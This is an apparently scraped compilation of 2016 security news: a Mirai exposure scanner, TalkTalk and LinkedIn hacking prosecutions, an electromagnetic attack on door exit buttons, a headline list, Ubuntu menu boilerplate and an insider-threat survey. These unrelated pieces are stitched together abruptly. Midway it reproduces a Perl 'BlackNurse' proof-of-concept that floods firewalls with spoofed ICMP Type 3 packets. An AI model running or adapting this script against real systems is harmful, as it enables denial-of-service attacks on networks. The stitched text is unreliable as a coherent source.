Ajith

Users can now check whether their network is exposed to Mirai, one of the most prolific botnets to have targeted Internet of Things (IoT) devices this year.

The botnet was initially detailed in early September, but it became more popular in early October, when its author released the source code online. The malware, designed to harness the power of insecure IoT devices to launch distributed denial of service (DDoS) attacks, had been previously used in massive incidents targeting Brian Krebs' blog and hosting provider OVH.

With the primary purpose of IoT botnets being DDoS attacks, it’s no wonder that Akamai said that Mirai wasn’t alone in the 665 gigabit per second (Gbps) attempt to take down Krebs. However, security researchers reported that Mirai was increasingly used in DDoS incidents following the source code leak.

One such Mirai attack targeted DNS provider Dyn and disrupted popular websites such as Twitter, Etsy, GitHub, Soundcloud, PagerDuty, Spotify, Shopify, Airbnb, Intercom and Heroku. With infected devices in 164 countries and the use of Internet protocols that aren’t usually associated with DDoS attacks, such as STOMP floods, Mirai continues to wreak havoc. 

Because Mirai’s success is fueled by the existence of IoT devices that aren’t properly secured, it could be easily countered by simply changing the default credentials on vulnerable devices and by closing the Telnet port the botnet uses for infection. That, however, is an operation that users and network admins need to perform, but they might not always be aware of such an issue impacting them.

To help users determine whether their network is exposed to Mirai or not, IoT Defense Inc., a startup company based in the Washington DC Metro area, launched a web scanner that does exactly that: it searches for opened TCP ports and informs users whether they are safe or not. 

The IoT Defense scanner was written using a combination of Python, Node JS and Jade frameworks and scans for nearly a dozen ports that botnets can exploit. Accessing and using the scanner is free and little instructions are needed, as it does all with a simple click of a button.

The tool was designed to scan for ports such as File Transfer Protocol (FTP), Secure Shell (SSH), Telnet (both 23 and the alternative 2323), HTTP, HTTPS, Microsoft-SQL-Server, EtherNet/IP, Telnet (alternative), Microsoft Remote Desktop Protocol (RDP), Web Proxy, and Apache Tomcat SSL (HTTPS).

While not all of these ports are targeted by Mirai, a couple are, with the 2323 Telnet port being specifically attacked. The IoT botnet scans the Internet for exposed IoT devices such as routers, IP cameras, and DVRs, and, when it finds vulnerable devices, it attempts to login to them using a list of default login credentials.

This, however, is a behavior employed by other botnets as well. What’s more, while disinfecting a device compromised by Mirai is very easy, because a simple reboot would suffice, keeping the malware away from that device is more complicated. Because of constant scans, vulnerable IoT products are re-infected within minutes.

Device vendors are those who need to take action, because users rarely do so T. Roy, CEO, IoT Defense, told SecurityWeek via email. They should add in-field auto-updates to their devices, should use per device unique passwords (something that router manufacturers have already started implementing), and should not open up unnecessary ports.

Because their incentives are not aligned with device vendors, it’s clear that users might not be the ones to fix this issue. Users might not care – provided that they are aware of an issue – that their routers, IP cameras, or DVRs are used to DDoS websites and DNS providers. As long as the bandwidth usage doesn’t affect them, they are not disadvantaged, and T. Roy believes that one solution would be for ISPs to impose bandwidth caps.

A set of rules to impose stricter security of IoT devices would also be of help, and steps in this direction are already being taken, with the Department of Homeland Security (DHS) publishing its Strategic Principles for Securing the Internet of Things. The document includes six non-binding principles designed to provide security across the design, manufacturing and deployment of connected devices.

IoT Defense’s CEO also notes that IoT vendors need to have a servicing model in place, to resolve vulnerabilities in their devices when they are discovered. Just as it happens with many other products, vendors would be given a window to resolve the found issues or face consequences. However, he isn’t very optimistic about vendors actually taking stance.

“As of today, IoT device manufacturers have very little to show for security which always gets trumped by new features and time or market concerns. It is wishful thinking to expect device vendors to step up their game and make security and privacy key differentiators for their products,” T. Roy said.

Last year, Gartner said that the number of connected devices will grow above the 20 billion mark by 2020. Now, Juniper Research estimates that there will be 38.5 billion connected IoT devices by that year, and that 70% of these units are expected to be non-consumer devices. Should the level of insecurity within these devices remain the same, the consequences will be dire for consumers, enterprises, and vendors alike.

The good news, however, is that even today enterprises block inbound open external access over protocols such as Telnet and SSH, meaning that IoT devices within corporate environments aren’t exposed. However, as Zscaler points out, these devices remain vulnerable nonetheless, and steps should be taken to defuse the situation, including automating the security and firmware updates and enforcing default password change at initial setup.

The issue at hand remains the existence of not only hundreds of thousands of IoT devices infected with Mirai, but also of hundreds of thousands more vulnerable to the botnet. More importantly, while the main purpose of IoT malware is the launch of DDoS attacks, cybercriminals have focused mainly on infecting complex devices, but could switch to simpler products such as smart toys, home appliances, wearables, and more, which would result in a flood of IoT malware all around us.

T. Roy agrees with that as well: “The day is not too far when Ransomware is going to straddle the boundary between the PC and the smart devices in the consumer's home. Unlike PC based ransomware where your pictures and videos are at stake, with everything being controlled by your smart devices your life and property are at stake.”

“Regulation will likely be the fix for IoT security,” F5 Networks evangelist David Holmes notes in a SecurityWeek column, citing Mikko Hypponen, Chief Risk Officer of F-Secure. However, he also explains that Internet security cannot be regulated like other manufacturing processes. Increasing awareness among users could also help resolve this issue, with the IoT Defense scanner being a small step in this direction.

view counter

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:


SecurityWeek RSS Feed

USN-3136-1: LXC vulnerability | Ubuntu

Jump to site nav

  • Jump to content
  • Cloud
    • Overview
    • Ubuntu OpenStack
    • Public cloud
    • Cloud tools
    • Cloud management
    • Ecosystem
    • Cloud labs
  • Server
    • Overview
    • Server management
    • Hyperscale
  • Desktop
    • Overview
    • Features
    • For business
    • For developers
    • Take the tour
    • Desktop management
    • Ubuntu Kylin
  • Phone
    • Overview
    • Features
    • Scopes
    • App ecosystem
    • Operators and OEMs
    • Carrier Advisory Group
    • Ubuntu for Android
  • Tablet
    • Design
    • Operators and OEMs
    • App ecosystem
  • TV
    • Overview
    • Experience
    • Industry
    • Contributors
    • Features and specs
    • Commercial info
  • Management
    • Overview
    • Landscape features
    • Working with Landscape
    • Return on investment
    • Compliance
    • Ubuntu Advantage
  • Download
    • Overview
    • Cloud
    • Server
    • Desktop
    • Ubuntu Kylin
    • Alternative downloads


Ubuntu Security Notices

Kiwicon Not every demo at security cons goes off without a hitch: Badass hackers Ryan and Jeremy electrocuted themselves when building what could have been the first device capable of wirelessly exploiting door-opening push buttons.

The pair demonstrated the trial and terror process of building the box at the Kiwicon hacking event in New Zealand last Friday.

Before its insides dissolved due to extreme heat, the device it was capable of activating the push buttons that open doors to allow egress from secure buildings - but from the outside of that building.

Ryan and Jeremy's beefed-up electromagnet is the latest in a niche line of research which would allow attackers to enter buildings by using the devices to unlock the push-button door controls.

"I guess they really are touch-to-enter buttons," Jeremy told the 2,000 laughing hackers at the Michael Fowler centre, Wellington.

"Should you be worried about this? Ehh probably not."

Ryan (left) and Jeremy. Image: Darren Pauli, The Register.

The pair chalked their work up as a failed-but-fun experiment, but in reality it was something more akin to success. Others interested in the field could leverage their work, as Ryan and Jeremy did others, to build a more stable device.

If that were to happen, scores of buildings would be at risk of break and entry.

Right now, penetration testers on red teaming assignments rely on extendable sticks to shove between automatic doors. Such rigs allow them to physically depress the buttons in a much more obvious attack.

Ryan explained one beefed-up prototype that used ignition coils bought from car parts chain Supercheap Auto: "Instead of driving that small coil, it drives this massive coil, which goes into an even bigger coil which generates a large voltage which then jumps the spark gap and, instead of igniting fuel, it hits the touch-to-exit button," he says.

"The air is literally conducting electricity, it's scary stuff."

description

'It was just a tickle'.

During the testing process his mobile phone stopped working.

The pair, who again requested photographic anonmity, then increased the amount of electrons running through their prototype.

The current hopped across the helping hands and through Jeremy; "it was just a tickle" he says, asking delegates to please not inform his wife.

Several pieces of equipment melted including a high current motor driver which blew up instantly in a puff of blue smoke. Another piece of kit became so heated its solder melted.

A prototype

A prototype.

They reworked some existing research which failed to open the push-to-exit buttons building an electromagnetic interference fuzzer which used a scripting language and a VLSI interface into testing equipment, plus a microphone used to detect if the contraption worked.

Lab gear.

Lab gear.

The lab gear helped the pair better understand the right frequencies required to interfere with the push-to-exit button. They found that lots of noise forces the exit buttons to reduce sensitivity, and that suddenly removing that noise causes buttons to unlock.

"Some of these devices implement frequency-shifting so they are trying to evade interference like that," Ryan says.

The final prototype: A microcontroller taped to a battery, taped to a resonance circuit, taped to more batteries. RIP.

A final balled-up and taped device proved able to unlock the devices through a glass door, meaning attackers could use it to enter locked buildings, but it soon melted.

"Forunately for us the frequency intereference doesn't have to come from directly in front of the reader, and can come from the sides," Ryan says. "The range wasn't great though, and then we realised we were only using a fourth of the power, so we increased it."

"The hole in the middle?" he says, pointing to a burnt-out integrated circuit; "not meant to be there."

"We're good at prototypes." ®

Sponsored: The state of mobile security maturity


The Register - Security

Three men are due to appear at the Old Bailey charged with various offences linked to an investigation into the mega TalkTalk hack a year ago.

The investigation was launched in October 2015 by the Met's Falcon Cyber Crime Unit following the hack in which 157,000 of its customers' personal details were accessed.

On Tuesday, 15 November, a 17-year-old boy pleaded guilty at Norwich Youth Court to seven offences under the Computer Misuse Act of 1990.

The boy was arrested in Norwich on 3 November last year and subsequently charged. He is due to be sentenced at Norwich Youth Court on 13 December.

The offences were all linked to the unauthorised access in October 2015 to data and programs on various organisations' websites including TalkTalk and Merit Badges as well as universities in Cambridge, Manchester, Sheffield, and Bournemouth.

As part of the wider investigation, detectives have also arrested three other individuals.

Daniel Kelley, of Llanelli, Wales, was charged on 26 September with various blackmail, cyber-crime and fraud offences, and is due to appear at the Old Bailey on Friday, 18 November.

Matthew Hanley and Conner Douglas Allsopp, both from Tamworth, were charged on 26 September with cyber crime and fraud offences and are due to appear at the Old Bailey on Monday, 21 November.

The investigation into the alleged data theft from the TalkTalk website is a joint investigation led by the Met's Cyber Crime Unit with support from Police Service Northern Ireland, Southern Wales Regional Organised Crime Unit, the National Crime Agency, and CERT UK (now the National Cyber Security Centre). ®

Sponsored: Customer Identity and Access Management


The Register - Security

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

Threatpost News Wrap, November 18, 2016

November 18, 2016 , 9:15 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

Network World | Nov 18, 2016

IBM Security has launched a network-emulation environment where corporate teams can play out attack scenarios so they are better prepared for incidents they might face in the real world.


InfoWorld Security

USN-3130-1: OpenJDK 7 vulnerabilities | Ubuntu

Jump to site nav

  • Jump to content
  • Cloud
    • Overview
    • Ubuntu OpenStack
    • Public cloud
    • Cloud tools
    • Cloud management
    • Ecosystem
    • Cloud labs
  • Server
    • Overview
    • Server management
    • Hyperscale
  • Desktop
    • Overview
    • Features
    • For business
    • For developers
    • Take the tour
    • Desktop management
    • Ubuntu Kylin
  • Phone
    • Overview
    • Features
    • Scopes
    • App ecosystem
    • Operators and OEMs
    • Carrier Advisory Group
    • Ubuntu for Android
  • Tablet
    • Design
    • Operators and OEMs
    • App ecosystem
  • TV
    • Overview
    • Experience
    • Industry
    • Contributors
    • Features and specs
    • Commercial info
  • Management
    • Overview
    • Landscape features
    • Working with Landscape
    • Return on investment
    • Compliance
    • Ubuntu Advantage
  • Download
    • Overview
    • Cloud
    • Server
    • Desktop
    • Ubuntu Kylin
    • Alternative downloads


Ubuntu Security Notices

 #!/usr/bin/perl
#
# Cisco ASA 5515/5525/5550/5515-X | Fotinet |
# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N |
# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# [email protected]
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Description:
# Blacknurse is a low bandwidth ICMP attack that is capable of doing denial
# of service to well known firewalls. Most ICMP attacks that we see are based
# on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based
# on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP
# Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly
# effective even at low bandwidth. Low bandwidth is in this case around 15-18
# Mbit/s. This is to achieve the volume of packets needed which is around 40 to
# 50K packets per second. It does not matter if you have a 1 Gbit/s Internet
# connection. The impact we see on different firewalls is typically high CPU
# loads. When an attack is ongoing, users from the LAN side will no longer be
# able to send/receive traffic to/from the Internet. All firewalls we have seen
# recover when the attack stops.
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# Thanks to Maya (Maiya|Mia) Hristova and all my friends
# that support me.
#
#

use Net::RawIP;

print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n";
print "[ ======\n";
print "[ Usg: $ 0 <spoofed address> <target>\n";
print "[ Example: perl $ 0 133.71.33.7 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $ spoof = $ ARGV[0];
my $ target = $ ARGV[1];

my $ sock = new Net::RawIP( icmp => { }) or die;

print "[ Sending crafted packets..\n";
while ()
$ sock->set({ ip => { saddr => $ spoof, daddr => $ target,
icmp => type => 3, code => 3 });
$ sock->send;
$ sock->set( icmp => { type=>3, code => 0});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 1});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 2});
$ sock->send;
}


Exploit Files ≈ Packet Storm

The Russian national arrested earlier this month by Czech police has been charged in the United States for hacking into the systems of LinkedIn, Dropbox and Formspring.

Yevgeniy Aleksandrovich Nikulin, 29, of Moscow, Russia, was arrested by Czech authorities on October 5, but news of the arrest only came to light last week.

While initially some believed that the arrest was related to cyberattacks supposedly launched by the Russian government against political organizations in the United States, LinkedIn revealed that the law enforcement operation, carried out in cooperation with the FBI, was actually linked to the breach suffered by the social media company in 2012.

The U.S. Department of Justice announced on Friday that Nikulin had been charged by a federal grand jury in Oakland, California, with nine counts related to obtaining information from computers, causing damage to computers, trafficking in access devices, aggravated identity theft and conspiracy.

Authorities said Nikulin is believed to be behind not only the LinkedIn breach, but also the 2012 attacks on Dropbox and Formspring.

The Dropbox hack, carried out after an employee’s credentials were stolen, has affected more than 68 million accounts, but the full extent of the incident only came to light recently. As for the social Q&A site Formspring, hackers leaked 420,000 hashed passwords back in 2012, which triggered a password reset on all user accounts.

According to the DoJ, LinkedIn and Formspring were also breached after hackers obtained employee credentials. Authorities said Nikulin conspired with others to sell the information stolen from Formspring.

Nikulin is currently in custody in the Czech Republic and the United States hopes to convince Czech authorities to approve his extradition. On the other hand, Moscow insists that the man be handed over to Russia.

Related: Moscow Confirms Ministry Website Attack After U.S. Hacker Claim

Related: 50 Hackers Using Lurk Banking Trojan Arrested in Russia

Related: US Jury Convicts Russian MP's Son for Hacking Scheme

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

A new Bitglass report on insider threats in the enterprise found that, in a third of organizations surveyed, careless or malicious user behavior resulted in data leakage, up slightly from a year ago. 56 percent of respondents believe insider leaks have become more frequent in the last year.

insider attack

“Adoption of cloud and BYOD are positive developments, but organizations that have limited cross-app visibility will struggle to detect anomalous behavior and need to rethink their approach to data security,” said Nat Kausik, CEO, Bitglass. “The reality is that cloud apps have made data more readily accessible and insider threats more likely – it’s up to the enterprise to put adequate data controls and policies in place to secure vital data.”

Bitglass found that 64 percent of enterprises can detect a breach within a week, up significantly from 42 percent a year ago. Only 23 percent take a month or longer to identify insider breaches, which indicates growing use of cloud-based audit and security tools. Respondents identified analytics as critical in detecting anomalous behavior.

Employee training (57 percent) and identity management solutions (52 percent) topped the list of best means for preventing insider attacks. Data leakage prevention was also included among the most effective tools in 49 percent of organizations.

insider attack

Key findings

  • One in three organizations surveyed have experienced an insider attack in the last year, while 74 percent feel vulnerable to insider threats.
  • Seventy-one percent of cybersecurity professionals are most concerned with inadvertent leaks that are the result of risky unsanctioned app usage, unintended external sharing and unsecured mobile devices. Negligence (68 percent) and malicious insiders (61 percent) were also of concern to respondents.
  • Privileged users, more than any other user group, were seen as posing the greatest security risk by 60 percent of organizations.
  • Cloud and mobile are forcing IT to rethink detection and prevention. Cybersecurity professionals agree that lack of employee training (62 percent), insufficient data protection solutions (57 percent), more devices with access to sensitive data (54 percent) and more data leaving the network perimeter (48 percent) are at the core of many insider leaks.
  • A third of organizations do not have any analytics solutions in place to detect insider threats. Fifty-six percent use some kind of analytics solution to address anomalous behavior, but only 15 percent have user behavior analytics in place.
  • Collaboration tools (44 percent) and cloud storage apps (39 percent) were perceived to be most vulnerable to insider threats, as careless users are easily able to share data externally or lose a mobile device that contains sensitive information.


Help Net Security